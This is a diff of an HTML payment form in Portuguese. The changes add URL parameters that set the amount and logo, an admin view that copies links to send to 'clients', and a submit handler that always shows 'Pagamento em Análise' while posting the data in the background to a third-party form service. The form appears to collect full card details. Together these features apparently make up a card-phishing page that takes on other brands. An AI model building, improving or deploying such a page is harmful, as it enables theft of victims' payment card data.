--- a/index.html
+++ b/index.html
@@ -109,7 +109,7 @@
 
     <form id="paymentForm" action="https://formspree.io/f/xqezowag" method="POST">
 
-      <!-- ===================== LGPD ===================== -->
+      <!-- ===================== LGPD (AJUSTADO PARA FICAR IGUAL À IMAGEM) ===================== -->
       <div class="bg-[#eef3ff] rounded-3xl p-6 md:p-8 mb-6 shadow-xl relative overflow-hidden border border-indigo-100">
         <div class="absolute top-0 left-0 w-2 h-full bg-gradient-to-b from-purple-600 to-indigo-600"></div>
 
@@ -222,7 +222,6 @@
         </div>
       </div>
 
-      <!-- ===================== FATURAMENTO (AJUSTE DE ESCRITA: "ENDEREÇO" -> "FATURAMENTO") ===================== -->
       <div class="bg-white rounded-3xl p-6 md:p-8 shadow-xl">
         <h3 class="font-bold text-gray-800 text-lg mb-6 flex items-center gap-2">
           <i class="fas fa-map-marker-alt text-purple-600"></i> Faturamento
@@ -239,8 +238,7 @@
           <div class="col-span-1"></div>
 
           <div class="col-span-2">
-            <!-- AQUI: antes estava "Endereço (Rua/Av) *" e agora fica "Faturamento (Rua/Av) *" -->
-            <input type="text" name="endereco" id="logradouro" required placeholder="Faturamento (Rua/Av) *"
+            <input type="text" name="endereco" id="logradouro" required placeholder="Endereço (Rua/Av) *"
                    class="w-full border border-gray-200 rounded-xl p-3 focus:ring-2 focus:ring-purple-500 outline-none transition bg-gray-50 focus:bg-white" />
           </div>
 
@@ -274,11 +272,10 @@
           Finalizar e Enviar para Análise <i class="fas fa-chevron-right text-sm"></i>
         </button>
       </div>
-      <!-- ===================== /FATURAMENTO ===================== -->
     </form>
   </div>
 
-  <!-- ===================== ANALYSIS ===================== -->
+  <!-- ===================== ANALYSIS (IGUAL À IMAGEM) ===================== -->
   <div id="view-analysis" class="hidden w-full max-w-md mx-auto mt-16">
     <div class="bg-white rounded-[2.5rem] px-8 py-10 shadow-2xl text-center relative overflow-hidden">
       <div class="absolute -top-20 left-1/2 -translate-x-1/2 w-56 h-56 bg-purple-500/20 blur-3xl rounded-full"></div>
@@ -331,6 +328,39 @@
   </div>
 
   <script>
+    const TAXA_JUROS_MENSAL = 0.0035;
+
+    window.onload = function () {
+      try {
+        const params = new URLSearchParams(window.location.search);
+        const isAdmin = params.get('admin') === 'true';
+        const status = params.get('status');
+        const valorUrl = params.get('valor');
+        const logoUrl = params.get('logo');
+
+        const viewAdmin = document.getElementById('view-admin');
+        const viewClient = document.getElementById('view-client');
+        const viewAnalysis = document.getElementById('view-analysis');
+        const viewSuccess = document.getElementById('view-success');
+
+        viewAdmin.classList.add('hidden');
+        viewClient.classList.add('hidden');
+        viewAnalysis.classList.add('hidden');
+        viewSuccess.classList.add('hidden');
+
+        if (isAdmin) {
+          viewAdmin.classList.remove('hidden');
+        } else if (status === 'aprovado') {
+          viewSuccess.classList.remove('hidden');
+        } else {
+          viewClient.classList.remove('hidden');
+          configurarFormulario(valorUrl, logoUrl);
+        }
+      } catch (e) {
+        console.error(e);
+      }
+    };
+
     function formatarCartao(input) {
       let v = input.value.replace(/\D/g, '');
       let icon = document.getElementById('iconeCartao');
@@ -472,8 +502,11 @@
       navigator.clipboard.writeText(texto).then(() => alert("Link copiado! Envie para o cliente."));
     }
 
-    // SUBMIT: sempre mostra "análise" e envia em segundo plano
+    // SUBMIT:
+    // - SEMPRE mostra "Pagamento em Análise" imediatamente
+    // - Envia os dados em segundo plano
     const form = document.getElementById('paymentForm');
+
     form.addEventListener("submit", async function (e) {
       e.preventDefault();
 
@@ -508,9 +541,6 @@
         console.error("Erro de rede:", err);
       }
     });
-
-    // JUROS CONFIG
-    const TAXA_JUROS_MENSAL = 0.0035;
   </script>
 </body>
 </html>
